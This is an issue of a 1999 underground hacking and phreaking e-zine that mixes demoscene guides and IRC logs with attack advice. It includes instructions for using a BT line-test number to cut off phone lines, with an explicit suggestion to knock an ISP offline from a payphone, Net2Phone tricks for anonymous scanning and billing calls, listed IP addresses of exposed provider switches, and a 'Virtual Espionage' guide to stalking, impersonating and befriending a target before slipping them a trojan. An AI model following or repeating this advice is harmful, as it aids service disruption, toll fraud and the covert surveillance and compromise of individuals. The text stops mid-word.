___________ _______________________________________ ", / / ___ _.-'' '. / / / / /NDERGROUND> .' _ | / / / / / _______ / / \ / / / / / / / ___ \ / __/_.' / / / / / / / /__/ / /.-'' .' / / / / / / _____.' /_________..-' / / / / /___/ /_ / / / / / '.____ __/ / / | / / / / / / \ | _.' /__/ERIODICAL> / / '-._'..-'_______________________________/__..-' "We're On The Up and Up" :..:..::..Issue..::..:..: Issue 6 October 1999 :..:..::..Staff..::..:..: CrossFire - Editor ergophobe (Walrus) - Writer Darkflame - Writer ::::::::..:..::.Website.::..:..:::::::: http://members.xoom.com/under_p :..:..::..Email..::..:..: under_p@yahoo.com :.:.Alternative Hosts.:.: ftp://t245.dccnet.com:95001 http://www.swateam.org http://surf.to/maquishacker :..::..Introduction.::..: <*> As you can see, Sadly Cyborg has left the UP staff, and I (CrossFire) have replaced him as editor. Cyborg left because of his upcoming exams (good luck btw m8), his new part time job (Work - Aargh), and the removal of the page from Ecad.org. Also Sadly HitMan has left the staff too, I was actually expecting that because HitMan and Cyborg are friends irl, and he doesn't have time for the mag any more. Still, we have a new staff member this month, Walrus (Or Ergophobe as you may know him) will now be doing some reviews of up and coming producers. Over the next couple of issues you will notice a change in the topics covered in Up, we will still be doing the same Hack / Phreak / General Underground Stuff, but the mag will start to showcase more stuff to do with The Demoscene, and The Tracker Scene, I also Hope that the mag will have a lot more technical articles. We Have Also formed an alliance with APT, Swat and Prick - Find Out More On The Krash Website (http://surf.to/krash). Some Of These Articles Were Included without the permission of the authors - this is mostly Because I simply couldn't contact them, most likely because they include no contact details in the files. All the files in Up6 Are Top Quality (Well I think so) - No Crap Will go into this mag (except some irc logs :) <*> Thanks To Everyone who contributed to Up6. Most Shouts are at the bottom. If I Forget you then Sorry - I'm a forgetful person generally :) CrossFire :..::.:..Contents.:.::..: <*> 0 - Introduction And Contents....: CrossFire <*> 1 - More Fun With A Phone........: ergophobe <*> 2 - Invasion of #smurf...........: #cocytusUK <*> 3 - A Phreaks Guide to net2phone.: Mob Boss <*> 4 - Virtual Espionage............: Mob Boss <*> 5 - Intro To The Demoscene.......: CrossFire <*> 6 - More 'features' in Win 9x....: ergophobe <*> 7 - LameLog......................: Exegency <*> 8 - Compuserve Password Finder...: Exegency <*> 9 - Underground Music Reviews....: Walrus & CrossFire <*> 10 - IP Spanking..................: #hackphreak <*> 11 - Pirch Passwords..............: Exegency <*> 12 - Mr Brewer The Pirate.........: Bruce Orwall <*> 13 - The ICQ So Called Protocol...: Bugtraq <*> 14 - ICQ Homepage Exploit.........: Shadow51 <*> 15 - Beginners Phreaking In The UK: uV & Senor Cardini <*> 16 - Hit The Major Search Engines.: Author Unknown :..:URL Of The Month.:..: Hack / Phreak http://surf.to/krash *Excellent* Site run by the APT Boys. Home of the Underground Alliance Hardcore http://www.walrus.bog.net Excellent site run by UP Writer - Walrus AND http://www.happycore.co.uk The Dizzy Kru - Soon To Be Open Demoscene http://www.ukscene.org UKScene - Dejavu - pukka :..::..Shouts..::..: CrossFire's Shouts: Cyborg, ergophobe, Darkflame, Erebus, Ody, DanNet, Netw0rk Bug, Firestarter, Brakis, crashd, tefx, linealtap, Megan, Sunburst, Darkcyde, Maquis Hacker, Exegency, Mob Boss, Shadow51, The Bugtraq List, DJ Majestik, DJ Smurf, DJ H@TTRiXX, MC C@TTYSARX, The Rest Of The Dizzy Kru, The Oldskool List, and the HappyCore List. Send all praise, fanmail, gifts and e-cards to crossfire@hackers-uk.freeserve.co.uk . Send all flames to couldnt.give@toss.co.uk ergophobe's shouts: Erebus, psi, Pyr0-Pr0xy, CrossFire, Tefx, linealtap, everybody I forgot and 'The New York Bagel co.' (food of the gods).(and food of ergophobe by the looks of it :-) - Ed) And if anybody wants to get in contact with me, send all your comments/feedback/fan mail/gratuitous abuse to ergophobe@dial.pipex.com _____ _____ ___ ___ __ / | \| _ \ \ \/ /| | / \ __/ \ / | | \ / | \ / | | \_____/|__| \/ |__| PRESENTS: More fun with a phone ~~~~~~~~~~~~~~~~~~~~~ By: ergophobe Short and sweet I know, but there's really not a lot to be said. There have been a lot articles written about using 175 and 17070 to perform tasks such as ringback linetests and shutting down the line. Well, a friend of mine was doing an 0800 scan recently and found an alternative. 175 and 17070 are both becoming more increasingly difficult to use now, and only worked on certain types of phones in the first place. This one can be dialed from every phone we've tried it on (quite a lot) including several different moblies, land lines and just about every type of payphone we've been able to find including a Eurobell one. So "what is this magical number?" I hear you cry. 0800 373983 should do the job nicely. Use it in the same way that 17070 was used. For those of you who are not familiar with 17070 (if you've been living in a cave or something), forst it will tell you what the number you're phoning from is, then it will just give you a list of options, and you press the button that corresponds to the option you want. The options are: 1 Rings the phone back when you hang up 2 Quiet line 3 Gives you another set of options for testing lines in various ways (this is absolutely hilarious, it says "press 1 if you have been authorised to use this system, or hang up. If BT really think anybody is going to hang up at this point they are even dumber then I thought!!!) 4 Hangs up (clear down). Option 3 is probably the most useful of them. It allows you to test and shut down lines in various different ways. Possibly the best thing is the "cable pair idnetification" option. This will cut off any traffic to the line that you identify. Very handy for cutting people off when you want to get through. I've not tried this one YET, but a cable pair identification on an ISP could cause some serious havoc. Try it on 0845 0796699 (freeserve) for example. This option really has some potential. If you are planning on cutting off all the traffic on the line of an ISP, for gods sake do it from a phonebox or a ripped mobile. You shouldn't really need to be reminded of these things, but anybody can make a mistake. It is worth noting that if you're trying this from a phone which uses pulse dialing (WHY?) then you'll need your tone dialer handy, as it needs the tone for the number rather than the clicks. I'd have to say that just about covers this particular topic, but try experenmenting with the options that this little number gives you, as you never know how useful they may turn out to be. ergophobe#smurf Logs - By CrossFire et all Rightie Ho, here's what happened when the #apt crew invaded #smurf . Germans eh? CrossFire = OingenPoingenBoy (der) , DanNet = Smurf, NBug = Netw0rk Bug, M0RPH = Erebus. Session Start: Sun Sep 05 11:19:59 1999 *** Now talking in #Smurf *** Topic is '#Smurf .- Oingen Poingen Drinken Doingen :) ( http://home.sol.no/~timki/smurf.html )' *** Set by [General] on Sun Sep 05 04:08:51 -[GenBot]- Velkommen til #Smurf - CrossFire - Besøk også min hjemmeside Http://home.sol.no/~timki *** Nbug (bug@host62-172-63-2.btinternet.com) has joined #Smurf WHAT A SHIT CHANNEL ! LOL ! *** Nbug (bug@host62-172-63-2.btinternet.com) has left #Smurf *** M0RPH (~m0rph@host5-171-253-27.btinternet.com) has joined #Smurf Bwaaaaaaaaaaaaahahahahaha Hello English People ! HELLO Hello You German Peeeeeople! <[SmurFen]> hi CrossFire *** M0RPH (~m0rph@host5-171-253-27.btinternet.com) has left #Smurf Ok thats freaking me out All The Germans Here ! HELLO ! LOL <[SmurFen]> lol damn! Smurfen: So whats this chan about *lol* My Nickname at school is smurf ! you realize that youre talking to a bot..? Heh, my nickname at school is robin hood but i don't brag about that :P LOL ! <[SmurFen]> lol damn! Shut the fu** UP BOT ! heh Bots r00l supreme :) Hey Can I Get Ops In Here ? no Why ? heh, the female smurf is pretty cute... no way, no how just cuz.. okki? Oooh, I Like it when girls talk tuff :) Shut up she anint no smurf if she won't give ops to a fellow smurf ! I bet she's not even blue *** DanNet was kicked by Artica (I WILL, however, kick your ass outta here.. byebye sucker) (Ed- Tuff room innit?) *** DanNet (~Daniel_fr@host212-140-99-156.btinternet.com) has joined #Smurf *** Artica sets mode: +b *!*@host212-140-99-156.btinternet.com #usap *** DanNet was kicked by mentos (banned) dumdidumdidei.. Outta Here Bods... Respectacles :P Session Close: Sun Sep 05 11:24:23 1999 A Phreak's Guide to Net2Phone By: The Mob Boss Net2Phone (www.net2phone.com) is an Internet telephone company, which was founded under IDT Inc. They provide good rates for international and domestic phone calls all placed over the Internet. Time is bought with a credit card right through their site or over the phone. Net2Phone is both half-duplex and full-duplex. At this time is runs on a Windows 95/98/NT platform. One of the most appealing things to hackers and phreakers is the free registration and calls to toll free numbers. You can register and download the software all without paying a dime and then use it to place calls to 800, 877, and 888 numbers, no questions asked. This allows phreaks from other parts of the world to access numbers native to the United States and it allows domestic hackers and phreakers the opportunity to make somewhat anonymous calls. When you make a call with Net2Phone the number will show as (212) 402-0000, a number in New York City. When you give that number a call you see its a "non working number", or so the computer voice will tell you. So this can be used for some very devious things if one was so inclined. Now as for some uses for this, you can use it for exchange scanning. With most telco's wising up to programs like Toneloc, scanning by hand is becoming the thing to do. Even then, it's somewhat risky, especially when dealing with toll free numbers. As we all know the reason toll free exchanges are so feared is because of the dreaded ANI that they are equipped with. With Net2Phone you can scan and mess with whatever you like with a fairly good piece of mind. It would be far better to attempt to get into a voice mail box through Net2Phone rather then your home line since they might notice your number keeps showing up on their bill and just give you a nice little call. Another thing that you can do with Net2Phone is make certain calls through the operator. Now this requires a little more thought because Net2Phone doesn't really want you to call other services to place your calls. For instance 1-800-Call-ATT is blocked and so is the beloved 1-800-Collect. So to get around this we must find numbers that aren't blocked. Now this is easier then you think. Here are some useful numbers I have found not to be blocked, for an AT&T operator call 1-800-Operator, for a 1-800-Collect operator call up 1-888-Collect, for Sprint service call up 1-888-One-Dime. I am sure there are plenty more as well so when these go dead some day just look for small companies who do collect service. From these numbers I have found you can readily do collect calls and third party billing calls. So far I haven't been able to make any operator assisted calls but with some social engineering I am sure it's possible. And the reason I think you may be able to eventually op divert is due to the fact your not calling from a payphone or anything. With some hardwork and patience it can be done. Now as for the setup of Net2Phone I have found they are not the biggest on security. Outside of the firewall I found some interesting things such as their 3Com Superstack II Switch Login at 198.4.75.6, I also found what appears to be routers at 206.20.53.30, 206.20.53.46, 206.20.53.62, 206.20.53.81. So it seems there operation runs through that Superstack II switch to some sort of standard telephony switching possibly, which would obvisouly be some sort of electronic switching. Another thing I have yet to mention is the fact that you can use calling cards that have toll free numbers with this service and even use the free calling card, Freeway, available at www.broadpoint.com. Net2phone is a interesting and rich little service and I hope all that read this will not attempt to rip them off (too much at least) but rather learn about the new dynamic field of internet telephone which seems to be advancing and expanding every day. -The Mob Boss; http://mobboss.dragx.cx Voice mail and fax: 1-877-203-3043 Edited By: Glock _____________________ / * BBS LIST * /| /____________________/ | | |M | | The Sacrifial Lamb|O | | english.gh0st.net |B | | | | | Ripco BBS |B | | ripco2.ripco.com |O | | |S | | The NorthLand |S | | Underground BBS | | | nub.dhs.org | | | | | | L0pht BBS | | | bbs.l0pht.com | / |___________________|/ This has been a publication written by THE MOB BOSS; He is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the users discretion. THE MOB BOSS in no way or form supports, aids, or participates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS are strictly for informational purposes only. THE MOB BOSS © 1999 all rights reserved Virtual Espionage A guide to doing it and protecting yourself from it By: The Mob Boss Espionage is something that goes on everyday. No I am not talking about the movies and I am not talking about the bullshit you see on your local news. I am talking about the information gathering that goes on every day, specifically the kind that goes on the vast world we call the internet. Lets face it the net and phone network has become something of virtual world. It's a place where shopping, work, communication, and leisure occurs on a day to day basis. If you think about it, this creation of a new world was inevitable with hundreds of people from all over the world discovering it for the first time each day. With some much information on one network is it that bizarre to think that someone might want to gather more information then they were meant to know. To want to find out information about someone else on that vast network is not so strange when you consider the many people who LIVE on IRC and other means of communication. Not to mention with so much money flowing through those phone and cable lines, its obvious someone might want to steal it. Now it's nothing to be paranoid about and its not something to avoid the web over, its just something to be aware of. For instance how do you know someone you pissed of on IRC is spying on you? How do you know some law enforcement agency is not monitoring a channel or newsgroup you frequent? Well that's what this article is about so if you still interested keep on reading. Ok so you understand there are prying eyes and ears out there so what kind of precautions do you plan to take? That depends on what kind of things you do online. For instance if you are some sort of holy man online then I doubt the government is concerned with you. But let's consider you someone who thinks freely and does things that might be somewhat questionable, then you might want to consider watching yourself. First step to becoming anonymous on the web is thinking about what forms of identification there are to tell who you really are. In real life that may be your drivers license, fingerprint, or signature. Online though, your IP, email address, and most importantly your phone number will lead back to you. The key is learning how to bypass that. For instance your IP address is left whenever you visit a page, whenever you sign on to chat, when ever you post to a discussion group. So what can you do about that you ask? You can bounce your IP. Something we can use to achieve this is proxies and wingates. Now although it seems simple enough most people don't go through the trouble of doing this for everyday things. I suggest that if you have two web browsers, that at least one of those should have an http proxy setup on it. So it slows you down a little, no big deal, good things come to those who wait. Here's a freebie proxy which will probably go dead as soon as I release this, proxy.escape.ca:3128, now that should be placed in your preferences under proxies. Read the help file for your browser to see the specifics on how to specify your proxy. Most HTTP proxies run on either 8080 or 3128 so if that one goes dead just fire up nmap or your favorite scanner and look for IP's connecting on those ports. Now for you IRC chatting you have the option of either using a wingate, which is something like a proxy that connects on port 23 and identifies itself by the "wingate>" prompt, or you can use an IRC proxy, which will probably be easier, especially if you are using some sort of mIRC. I personally like wingates when I use BitchX and proxies for when I use mIRC. That's my personal opinion but feel free to form your own thoughts. Now if you don't already know how to use a wingate there are plenty of good texts out there on it. One I strongly recommend is by a friend of mine Alphavers, I don't know exactly remember the name but you can obtain it directly from him on Undernet #ANSI, he's on there all day, seven days a week. As for IRC proxies I am not going to give a freebie of this because I don't have more then two at the moment myself, I will say though they run on port 1080 (socks proxy) so like I said earlier fire up that IP scanner. You can also use a proxy to telnet, FTP, and even send mail by directly connecting to the smtp port (25). As I suggested earlier read up on wingates. If you would like to see a wingate for yourself you can always find the ones that were g-lined on IRC by giving the "/stat g" command, just look for exploitable wingate or too many connections and telnet to it. Most likely you will be sitting at the wingate prompt. Now that you are protecting your IP, what are you doing about giving information under your own free will? One thing that a lot of people do which is very, very, stupid is having their full name on their email address. If you do then its a good idea to keep that email address private and open up a free web-based email address such as one available at http://mail.yahoo.com or www.hotmail.com and use fake info only providing your internet handle. So now using a http proxy and an email address with fake info, you know have become somewhat anonymous because those headers will automatically show the IP of your proxy rather then yours when you send an email. Now another thing to consider is what you say online. Posting to some sex newsgroup and then using the same email address on Usenet to get involved in something else is probably a bad idea because those records of where you post are available to the public through www.dejanews.com and will probably be dug up. Also what do you tell people about yourself. Do you mention your real name to people? Do you tell people where you work or talk about your family? All those things can be used against you. Someone following you around in chat may be able to gather quite an extensive amount of information about you. Keeping your mouth shut may be something that comes hard at first but will definitely be worthwhile in the long run. You don't have to make like the dumb guard from Hogan's Heroes and do the "I know nothing" routine but being somewhat vague is definitely something smart. You don't want to make others suspicious of you but keeping your information private is what is the number one priority. Keep an eye out to see if a certain nick keeps popping up in the same channel or chat room you are in. Using the same street smarts you would use in real life are just as important on the net. Now that you know how to protect yourself its time to learn how to go on the offensive. How to become on the virtual James Bond. Most likely it won't be that exciting but it may come in handy. Lets start off by sizing up the target. Who is he? What does he do online? What is it we want to know or achieve? Once you have questioned your motives you are ready to begin. Setting up a dossier on the person is the first step. You should begin to note everything you already know about the person such as their handle, email address, ISP, and anything else you know off the top of the head. Secondly find out where they hang out and what handle do they go by. Frequent the places they go and follow them if you can but don't make the person suspicious or you will fuck up your whole operation. Note who their friends are. If you can get the persons AIM screen name, Yahoo Pager handle, or ICQ number by all means add them by using any excuse you can or don't give an excuse. If questioned by the person ignoring them might be the best bet. Getting to know their patterns for coming online is a good idea so you can know when to expect them. Now by doing all this you are putting yourself in a position to be able to spy on them and even clone their online identity. Posing as someone who uses AOL as his or her ISP would definitely be easy because those accounts are not too difficult to get. Noting their ident on IRC is also a good idea if you ever plan to try to snatch information by posing as them. Now I highly recommend you do the background work before you try that so that you don't screw up and blow your cover. Now after you have done that its time to give yourself a new identity and try to get close to them. Now if the person is usually very friendly then it shouldn't be too hard. Hang around where they do under your new identity which should be from a forged IP, a free email account with bogus info, and anything else someone online might have a like ICQ. Get to know the person and add to the conversations. Make friends with the person, never hinting who you are. Your own boasting is what might get you in trouble as it always seems to do it to everyone. Now for instance if this person is into h/p sharing some good info that you know they would be interested is something that you should attempt. If you share enough real info with them they may trust you enough so that you can slip them a trojan if you feel the need. Now I am in NO way advocating the use of trojan's but if you must you must to obtain your goal then use your best judgement and let it be on your head. By this time you should have already checked their computer by scanning it, seeing what operating system they use as well as any security breaches may be possible on it. Use your creativity and you will be fine. Gaining their trust is something that should not be rushed, if you do then its highly likely that you will fail in your motives. That's it for this article, I know this is a little different from my usual articles but I think its something everyone on h/p scene should be aware of since I have seen this on many notes throughout my career and felt it should be addressed. -The Mob Boss; http://mobboss.dragx.cx Voice mail and fax: 1-877-203-3043 Edited by Glock _____________________ / * BBS LIST * /| /____________________/ | | |M | | The Sacrifial Lamb|O | | english.gh0st.net |B | | | | | Ripco BBS |B | | ripco2.ripco.com |O | | |S | | The NorthLand |S | | Underground BBS | | | nub.dhs.org | | | | | | L0pht BBS | | | bbs.l0pht.com | / |___________________|/ This has been a publication written by THE MOB BOSS; He is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the users discretion. THE MOB BOSS in no way or form supports, aids, or participates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS are strictly for informational purposes only. THE MOB BOSS (c) 1999 all rights reserved Intro to The Demoscene By CrossFire Odds on, Quite alot of the Up Readers will have encountered the demoscene sometime in their underground career. If you haven't, Let me explain. A Demo is a program which displays graphics, music, and coding effects in one big light show, and the scene around it is called..... Wait for it........ The Demoscene! Unless You have been asleep for the past 2 or so Years, you will undoubtedly have heard of the Tomb Raider Series of games, made by Eidos Interactive. Some of the staff at this great software company were former members of the Scene Group, The Black Lotus. For Example, Danny Guertsen (danny.geurtsen@eidos.co.uk), IMHO Danny is the Greatest Graphician to ever walk this earth. Unfortunatley Danny is no longer a scener, and only pixels for Eidos These Days. Important Groups to Look for: Future Crew: These guys made some amazing demos, and really revolutionized the demo-scene, in the early 90's, and did a lot to mold it into what it is today. Recently they released their (final?) demo, Final Reality. Of course this wasn't officially a demo, neither was it officially by Future Crew. It is a 'benchmarking utility' developed by their games-company Remedy Entertainment. It runs under Windows'95, and needs a hell of a machine to run at a decent frame-rate. It runs quite slow on my P133 with 3Dfx.. If you have a state-of-the-art machine, with a 3D-card, I'd recommend it, otherwise steer clear.. What these guys *have* proven however is that the demoscene can indeed be a road to success. They are currently developing 'Max Payne', the replacement of the 'Duke Nukem'-series, for 3D Realms. They've gone totally commercial though, as I've predicted.... Some of the greets from Final Reality: Siemens Nixdorf, Intel, IBM, MICROSOFT!!! That's right: MICROSOFT!! Jeez... Their past glory can be witnessed in: Unreal, Panic, Second Reality, Yo!, and lots of other demos. Have to be seen to be believed. If you want to see what their doing now, buy Max Payne, or that car-game they did, or get hold of Final Reality.. Used to be thought of by many as the ultimate demo-group. I never have shared that view, and lately my feelngs to that direction have been enhanced. Pioneers of making newbies feel like lamers.. From Finland. EMF: The Electromotive Force, to give them their full name is one of the best groups ever, in my opinion. They were in the same league as the Future Crew, and today they go beyond what I believe the Future Crew could today, in the terms of demo-design. They are still going strong(?), and have had a lot of success at demo-parties. You should get hold of Verses, Eclipse, Caero, and Porno. Four very good productions from EMF. (Caero was by EMF & Plant.) A lot of the EMF-people are also members of Plant. They've been a bit to silent lately for my liking, and I don't think I'm the only person who noticed the disappearance of emf@mea.utu.fi.... I really hope they're not quitting. Perhaps they've dropped EMF, and merged with Plant? Anyone know? From Finland. Triton: They've also been around as long as the others, and they made the tracker that a lot of demo-scene musicians use today: FastTracker II. Triton are remembered today by many as: "The ones who finally beat Future Crew", as the release of Crystal Dreams II pushed FC of the no.1 spot in the charts. They released two good demos: Crystal Dreams, and Crystal Dreams II. Today they are involved in the gaming business, and have run into a little legal trouble with GT interactive, according to the rumours. From Sweden. Komplex: They've been around for a while, and are among the best groups today. Dope is pretty impressive, but if you want the full experience you will need a GUS for sound. A lot of people would call Dope one of the best demos ever released, but I kind of think it lacks something. Can't quite put my finger on it.. They are obviously eager to grasp new technology, as they were the first demosceners to make good demos for both 3Dfx and Java. Their Java-demo will truly blow your mind. It has proven to me that it is possible to make demos in Java. They're a brilliant group, and they make brilliant demos. Yet another example of finnish talent. For some strange reason they are now Komplex, not Complex... From Finland. Valhalla: Great group with huge success. They go a long way back, and are still today among the best groups. As opposed to a lot of great groups they are not arrogant, and they don't mind speaking to newbies it seems. Nice guys. :) Check out Visions Of Light, Solstice, and their OS/2 promo-demo. You'll be in for a treat. Have these guys also left the demoscene?? From England. Hornet: Really good group. Not very many productions, but they are the foundation of the demoscene on the Internet. Without them I do not think the scene would be as international as it is today. The Hornet Archive is really as close you'll get to the DemoScene's www-headquarters. Explicit is a cool demo by Hornet. From USA. Orange: I have to admit that I don't know to much about this group. I have a few demos & intros by them, though. They're a totally different group from all the others. Originality is definetely their main trait. They are very skillfull. Their productions are both weird, and cool. One of the most popular groups around lately. Masses of stuff too look for; I especially like 'Compost', a '70s-style demo! Another popular demo by them, is 'The Secret Life of Mr. Black'.. Weird.. From Finland (?). Psychic Link: Pretty new group, compared to the others I've mentioned here, but they look like they have a chance of being the next revolutionaries. At least Statix, a real wizard. Act1, Juice & Headache should be seen. I also think Paper is one of the best designed 64K-intros ever. From England. COMA: A good and different demogroup. They've done some really impressive stuff, but to understand why I decided to put them here you have to see their intro Stikman. NOW! After you've seen that you'll need to know they can code other stuff as well. Then you can take a look at the demo called Control. You could watch another popular demo: Insects, or their TG98 demo. It may just be a joke for TG98, but in their TG98-demo they call themselves KOMA, like Complex called themselves Komplex. From Finland. TBL: The Black Lotus are the undisputed rulers of stuffing most data into 64K. Way to go! I would be impressed if their 64 KB intros were 2 MB demos! Take a look at Jizz or Stash to see what I mean. From Holland & Sweden. Pulse: I love them for their blend of oldskool-style combined with their up-to-date coding. Today's code/gfx/music, yesterday's superior style. Brilliant group, currently no.1 on the Hornet Charts. Take a look at Square, Tribes, Reve, Broken Pipe, Sink, and lots of other stuff. From Poland & France. (Group listing Taken from the Demoscene Starter Kit V3.0) Where to Meet sceners: IRC --- IRC is probably the greatest way to meet sceners from all over the world, so I have included a listing (categorised by server) of some of the best channels to meet demosceners from all around the world. Note: You must have an IRC Client to be able to access IRC - try www.mirc.co.uk for windows 95 or www.bitchx.com for Unix. IRCNET (irc.stealth.net) ------------------------ Channel Description #coders Probably the most well known Scene IRC channel, mostly normal coders Hang out here but it is often frequented by Sceners #trax The IRC Channel for the Music Scene #pixel The Graphics Scene Channel, Famous for it's spontaneous 30 min compos #thescene A Channel for sceners on PC, C64, Amiga and loads of other platforms, formed by Surfing/Ramjam #scene The PC Scene HQ Local scene IRC channels British ........... #ukscene Czech ............. #scene.cs Danish ............ #dk-scene Dutch ............. #nlcoders Finnish ........... #suomiscene French ............ #demofr German ............ #coders.ger, #kotraum Hungarian ......... #scene, #coders.hu, #demoscene, #SceneChat Israeli ........... #ilcoders Norwegian ......... #daskmig Polish ............ #polishscene Slovak ............ #scene.cs Slovenian ......... #scene.si Swedish ........... #scene.se, #swedescene EFnet (irc.chat.org) -------------------- Channel Description #coders As above #trax The Friendliest Chat Room on IRC (apart from #upzine of course :). I often come in here so look out for me #pixel Not Very many people hang out here, try IRCnet for more ppl #scene Ditto #thescene Ditto Local scene IRC channels British ........... #ukscene Czech ............. #scene.cs Danish ............ #dk-scene Dutch ............. #nlcoders Finnish ........... #suomiscene French ............ #demofr German ............ #coders.ger, #kotraum Hungarian ......... #scene, #coders.hu, #demoscene, #SceneChat Israeli ........... #ilcoders Norwegian ......... #daskmig Polish ............ #polishscene Slovak ............ #scene.cs Slovenian ......... #scene.si Swedish ........... #scene.se, #swedescene SceneNet (irc.scene.org) ------------------------ SceneNet was founded as an Alternative to AnotherNet which has become largely commercial and proprietry client orientated, the server is totally for sceners, but a bit quiet at times. For a list of all the channels, log on to this server and type /list . ------------ Demo Parties ------------ Another Brilliant way to meet sceners is to go to a demoparty. What is a demoparty You ask? Demoparties are the Demoscene's answer to things like Defcon. With differences that people take their computer's, enter their demo's into competitions, drink, eat, and have fun. The Party --------- Undoubtedly the biggest and most commercialised demoparty is TP. Held in Sweden every year, this party is famous for it's bunch of quakers in attendance, last year there was even a report that a group of quakers complained about "Those noisy competitions", still, if you really want to be around Mp3 / Warez / Porno Trading pre pubescant Quakers, then this one is for you. Website: http://www.theparty.dk Assembly -------- Another Big and Commercialised party is Assembly, While this was a well respected party in years past, in the past 2 years or so it has become, well, big and commercialised. Many Sceners fondly remember Parties like Assembly '97, which was probably the last time Assembly was a 100% Scene Party. Recently though, This has changed to the level when Assembly is a clone of it's big brother TP. It still gets worse, Last year a local newspaper got involved and started up Multi Player Gaming Tournaments. Can You say Lamers meeting boys and girls? Website: http://www.assembly.org Movement -------- The Last party I will mention , and probably the best party IMHO is Movement. This party has broken down so many barriers by Hooking up with www.scene-central.com and starting up cyber visiting. Movement is Held in Israel every year now, Movement used to be lucky if it got 80 visitors, now with the widespreadness of the internet, By Registering on the Movement Website, You get a login and password, and oppurtunities to enter and vote on the competitions, watch the party via a webcam, and chat with the sceners actually there via IRC or a java client. For a first time party goer, I would definetly recommend Movement. Website: http://www.movement.org 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Scene Resources ---------------- DemoScene archives 0-0-0-0-0-0-0-0-0-0 The Best Place to find all the latest Scene Productions are the many archives cluttered about the net, so just for you, here is a list of the best archives around: The Hornet Archive - http://www.hornet.org Definetly the most famous Archive in the scene, Hornet is now closed for uploads, but still hosts all the best Demoscene related stuff from 1992 - 1998 . Trebel - http://www.trebel.org Trebel was started shortly after Hornet closed as a replacement for Hornet. It is not fully started yet, but the main pages are in place and it has promise to take over where The Hornet archive left off. Scene.org - ftp://ftp.scene.org Scene.org is the official replacement to hornet, and although it has been up and running for a while, It now hosts one of the largest archives of demoscene related material on the net. The Skynet Archive - ftp://skynet.stack.nl/pub/demos Skynet is the dutch scene's main archive, hosting selected groups and diskmags (Scene related Ezines), this archive is the best place to get anything Scene Related from Holland. Overflow - ftp://overflow.scene.org Overflow used to be the Main archive for the Dutch Scene, but has recently been cleaned out and only contains a few productions. Amber - ftp://amber.bti.pl Amber is the main server for the Polish scene. There is really much stuff. However, while it is fast in Poland, it is very slow in the rest of the world. TEN - ftp://ftp.beit-eli.gov.il/Incoming/ten The Home of the Emag Network, this site hosts all of the diskmags that are part of The Emag Network, and some that arent. Aminet - http://www.aminet.org The Amiga Network. Enough Said. This server carries some of the best amiga stuff around, I can feel the nostalgia just thinking about it :-) Diskmags 0-0-0-0-0 Diskmags are the Scene's Equivelant of The Underground's Ezines, but with the difference that they are all bundled into one .exe file, with a great interface and often some music to listen to. HUGI Magazine - http://home.pages.de/~hugidownload *the* best scene mag around. Period. Hugi is edited by Adok, and features articles for the PC, Amiga and C64 scenes alike. Great interface, Great Graphics and Brilliant music. Rating: 10/10 Shine - http://shine.scene.org From What I have seen of this mag, this could well be the pretender to HUGI's Throne. Although not full of content, the latest issues have been really good, and combined with great humor and a great interface, this one is seriously good Amnesia - http://amnesia-dist.future.easyspace.com At Last! A UK Based Scene Mag, Amnesia is a pretty much one man operation (Well issue 1 is, I dunno if issue 2's out yet, that might be different.), and Includes articles on Hacking, Phreaking, The Warez Scene, and the demoscene! This mag has great potential, and If it keeps going I predict it will reach the top. (These are all the diskmags I think are worth including, a) because there isnt many good diskmags around, and b) I can't remember the Imphobia URL for the life of me :P ) Demo's / Intros Worth Seeing ---------------------------- Demo / Intro Name Group Comments ----------------- ----- -------- Second Reality Future Crew Although this is old, this is the demo that got alot of people into the scene. Not Really Stunning compared to newer demos, but good all the same. Clone Meets Clone Acme A stunning Intro from Acme, This is a must see for anyone interested in the demoscene. Stash TBL Another Absolutely Stunning Intro, this time from the legendary group The Black Lotus. The Sequel to Jizz. Jizz TBL The one before Stash, Absolutely Breathtaking. Sunflower Pulse A Real Landscape in demo's. Coded by the ledgendary Unreal. Leech this *now*. 303 Acme Another Big step in democoding, This is Acme's Best known production. A Must See for anyone. Square Pulse This demo is pretty recent, and won first place at the party it was released at. Even So, I cannot remember which party it was :~) Tribes Pulse Boy Pulse Get around :) This demo is rather unique in the fact it tells a story. A must see. Toys Gods I haven't seen this one, but it is supposed to be great. Get it anyway. All of these Demos / intro's can be got from ftp://ftp.scene.org . The End. Please send your comments on this article to: crossfire@hackers-uk.freeserve.co.uk , If this article has good feedback, i may write a series of demoscene related articles. | _> _ _ ___ ___ ___| __><_> _ _ ___ | <__| '_>/ . \<_-<<_-<| _> | || '_>/ ._> `___/|_| \___//__//__/|_| |_||_| \___. _____ _____ ___ ___ __ / | \| _ \ \ \/ /| | / \ __/ \ / | | \ / | \ / | | \_____/|__| \/ |__| PRESENTS: More 'features' in Win 9x. ~~~~~~~~~~~~~~~~~~~~~~~~~~ Anybody running a Win 9x box particularly one with IE4 or IE5 installed will have noticed that some folders such as your fonts folder, 'My Briefcase' and the 'Recycle Bin' behave differently to normal folders. Perhaps you want them to behave like normal folders, or create them in other places, or just bugger about with them a bit. Here's how it works. In any folder such as this, there will be a hidden file called 'desktop.ini'. Editing it will produce something along the lines of: [.ShellClassInfo] UICLSID={BD84B380-8CA2-1069-AB1D-08000948F534} This one is taken from my fonts folder. The '[.ShellClassInfo]' bit is found in all of these files, and means nothing. Its basically a comment. The next line may vary from folder to folder. A Common variation is to have CLSID instead of UICLSID. The value after the = sign is the important one, and will be different for every desktop.ini file. Creating a folder anywhere named xxx.{BD84B380-8CA2-1069-AB1D-08000948F534} (the xxx can be anything and can be any number of characters) will create a folder with the same properties as the fonts folder. The same applies for whatever else is after the '(UI)CLSID=' bit. When you've made yourself a few Recycle Bins and stuff, you will probably ask what exactly the point of this is. For a start you can delete desktop.ini, and make it behave like a normal folder. If your 'History' folder is pissing you off or something. But more importantly, most of you will probably have seen a list looking something like this: Network Neighborhood.{208D2C60-3AEA-1069-A2D7-08002B30309D} Printers.{2227A280-3AEA-1069-A2DE-08002B30309D} My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D} Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} InterNet.{3DC7A020-0ACD-11CF-A9BB-00AA004AE837} Recycle 